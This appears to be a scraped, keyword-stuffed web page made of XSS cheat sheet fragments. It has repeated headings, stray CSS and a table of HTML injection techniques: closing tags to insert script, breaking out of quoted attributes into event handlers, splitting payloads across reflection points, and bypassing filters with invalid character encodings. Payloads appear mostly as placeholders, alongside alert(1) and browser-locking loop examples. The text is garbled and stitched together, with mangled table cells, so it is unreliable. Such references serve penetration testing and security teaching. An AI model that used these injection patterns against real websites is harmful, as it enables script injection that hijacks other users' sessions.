Xss Payload Cheat Sheet



Portswigger’s XSS cheat sheet: Provides both interactive and PDF resources which help you find the best payload to use for a specific injection context. It will help you to find a filter bypass as well. Cross-site scripting (XSS) is a type of online attack that targets web applications and websites. The attack manipulates a web application or website into delivering malicious client-side scripts to a user’s unsuspecting browser, which executes the script. This cheat sheet lists a series of XSS attacks that can be used to bypass certain XSS defensive filters. Please note that input filtering is an incomplete defense for XSS which these tests can be used to illustrate. Basic XSS Test Without Filter Evasion. Execution Hacks v1.0 XSS Payloads www.xss-payloads.com Function Example Synopsis Function('alert(1)') Function(') self(typeof prompt.

The Book takes care to explain the elevation of Cross-Site Scripting (XSS) to the title of HTML Injection. This quick reference describes some of the common techniques used to inject a payload into a web application.

Xss Payload Cheat Sheet

This cheat sheet is meant to be used by bug hunters, penetration testers, security analysts, web application security students and enthusiasts. It’s about Cross-Site Scripting (XSS), the most.

In the examples below the biohazard symbol (U+2623), ☣, represents an executable JavaScript payload. It could be anything from a while loop to lock the browser, e.g. while(1){a=1;}, or something more useful that a creative attacker comes up with. You can quite easily find “XSS Cheat Sheets” elsewhere. The intent of this reference is to instill a sense of methodology into finding HTML injection vulnerabilities. Good exploits take advantage of HTML syntax and browser quirks in creative ways. Take the time to experiment with simple payloads and observe how (and where) the web application reflects them. Then turn towards the list of complex attacks on a cheat sheet.

Xss payloads list

Also notice how the syntax of elements and JavaScript have been preserved in cases where single- or double-quotes are used to prefix a payload. The injected quote prematurely ends a quoted string, which means there will be a dangling quote at the end. Whether the reflection point is in an intrinsic event or a JavaScript block, the dangling quote is trivially consumed by throwing an extra variable definition with an open quote:

;a='

Xss Injection Cheat Sheet

XssSheet

The dangling quote will close the delimiter and, in most cases, the syntax will be preserved. This type of closure isn’t really necessary for an exploit to work, but it’s a sign craftier exploits.

The table’s layout is a bit constrained by the format of this post. Keep an eye on it for updates to content as well as presentation.

Xss Payload Cheat Sheet

Stored Xss Payloads

table { border-collapse: collapse; border: solid }thead { border: solid medium; text-align: center; }td { border: solid thin; text-align: center; padding: 2px; }.leftText { text-align: left }

Xss Payload Cheat Sheet 2019

TechniqueCharactersPayload ExampleInjection Example
Close a start tag in order to insert a new element

(This usually happens within an element attribute, but keep in mind HTML comments and XML CDATA.)

>
/>
–>
]]>
><script>☣<script><input type=text name=id value=
><script>☣<script>

>
Insert an end tag in order to insert a new element

(Also useful where XML appears, such as RSS feeds.)

</element>
]]>
]]><script>☣<script><INFO><![CDATA[
]]><script>☣</script>
Close a quoted attribute in order to insert an intrinsic event” (ASCII 0x22)
‘ (ASCII 0x27)
“onEvent=☣;a=”<a href=”/redir?url=http://&#8221; onClick=☣;a=”“>
Break out of a JavaScript variable” (ASCII 0x22)
‘ (ASCII 0x27)
“;{☣}var foo=”<script>
var host = window.location;
var lastLink = “http://web.site/index?refurl=“;{☣}var foo=”“;

<script>
Split payload across multiple reflection points

(Also a good way to bypass filters. Use HTML comment delimiters to elide content between the two payloads. In some cases you might be able to use quoted strings to elide content.)

(as above)1: “<script<!–

2: –>>☣</script>

<input value=”“<script<!– “>other content <input value=” –>>☣</script>
Alter MIME interpretation of uploaded file

(Usually when content is expected to be served as text/plain, binary, or other non-HTML type)

Must be able to influence Content-Type header or browser’s MIME sniffing algorithmtext/html

application/x-javascript

Uploaded file contains JavaScript.
Image EXIF data contains HTML & JavaScript.
Bypass a filter using browser quirkAlternate whitespace character

Non-standard element or attribute

See http://x86.cx/html5/ for an example of a complex src attribute for an img element.
Bypass a filter using alternate or invalid character encoding

(The goal is to find a sequence that disrupts or confuses a parser enough that a character such as ASCII 0x22 is considered part of a multibyte sequence, but is served to the browser as a single-byte character. This would either occur because a server-side filter incorrectly stripped or rewrote the invalid sequence or the browser’s character parser misinterpreted the sequence.)

UTF-7
UTF-8
Unicode
%fe%22
%fd%22
%cd%22
%c1%22
%c0%a2
%80%22
%22
JavaScript execution in CSS and style definitions

[Obsolete for modern browsers due to security concerns]

IE Expressions
Mozilla -moz-binding